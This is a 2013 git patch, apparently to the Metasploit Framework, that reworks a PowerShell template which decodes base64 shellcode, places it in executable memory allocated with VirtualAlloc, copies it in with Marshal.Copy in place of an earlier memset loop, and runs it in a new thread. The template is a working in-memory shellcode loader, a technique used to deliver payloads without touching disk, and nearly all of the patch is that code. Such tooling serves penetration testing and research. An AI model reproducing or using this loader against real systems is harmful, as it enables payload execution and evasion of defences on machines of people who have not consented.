From 14c0096115a616a0fb51c00f7e6ffbe865825f37 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 16 Dec 2013 13:38:14 +0000
Subject: [PATCH] Update template

Use Copy instead of memset
Remove | Out-Null
---
 .../scripts/to_mem_pshreflection.ps1.template          | 10 +++-------
 lib/msf/util/exe.rb                                    |  1 -
 2 files changed, 3 insertions(+), 8 deletions(-)

diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template
index 95b37d1b6a..d1a83daf0c 100644
--- a/data/templates/scripts/to_mem_pshreflection.ps1.template
+++ b/data/templates/scripts/to_mem_pshreflection.ps1.template
@@ -21,11 +21,7 @@ function %{func_get_delegate_type} {
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
 		
 $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
-$%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32])))
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
 
-for ($i=0;$i -le ($%{var_code}.Length-1);$i++) {
-	$%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null
-}
-
-$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null
-[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xFFFFFFFF) | Out-Null
\ No newline at end of file
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
\ No newline at end of file
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 486076e448..3465ab42db 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -937,7 +937,6 @@ require 'msf/core/exe/segment_injector'
     rig.init_var(:var_return_type)
     rig.init_var(:var_type_builder)
     rig.init_var(:var_buffer)
-    rig.init_var(:var_memset)
     rig.init_var(:var_hthread)
 
     hash_sub = rig.to_h